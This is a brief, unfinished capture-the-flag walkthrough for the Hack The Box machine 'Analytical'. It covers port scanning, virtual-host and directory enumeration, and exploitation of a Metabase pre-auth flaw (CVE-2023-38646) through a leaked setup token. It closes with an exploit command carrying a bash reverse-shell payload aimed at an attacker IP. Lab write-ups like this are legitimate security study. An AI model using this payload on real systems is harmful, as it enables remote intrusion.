INFO:
IP:
10.10.11.233
Enum
Nmap gives this output:
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 3eea454bc5d16d6fe2d4d13b0a3da94f (ECDSA)
|_ 256 64cc75de4ae6a5b473eb3f1bcfb4e394 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://analytical.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
with this command
nmap -sV -sC -p- 10.10.11.233
the ip redirects to analytical.htb in the browser so we have to put it in our /etc/hosts. usually changing hosts is a sign to do vhost enumeration, so we can run both vhost and dir gobuster in the background while we explore the webpage.
So we’ll run gobuster dir -u analytical.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
and… no find.
When we just look through the website we find a login page, this redirects to data.analytical.htb, let’s add that too to our /etc/hosts.
We get greeted with this login screen
Googling metabase CVE finds us a lot of results.
**CVE-2023-38646
Apperently metabase has done some serious issues. The setup-token that is supposed to be private can be freely visited under this api directory /api/session/properties
. With
python3 exploit.py -u http://data.analytical.htb -t 249fa03d-fd94-4d5b-b94f-b4ebf3df681f -c "bash -i >& /dev/tcp/10.10.14.247/443 0>&1"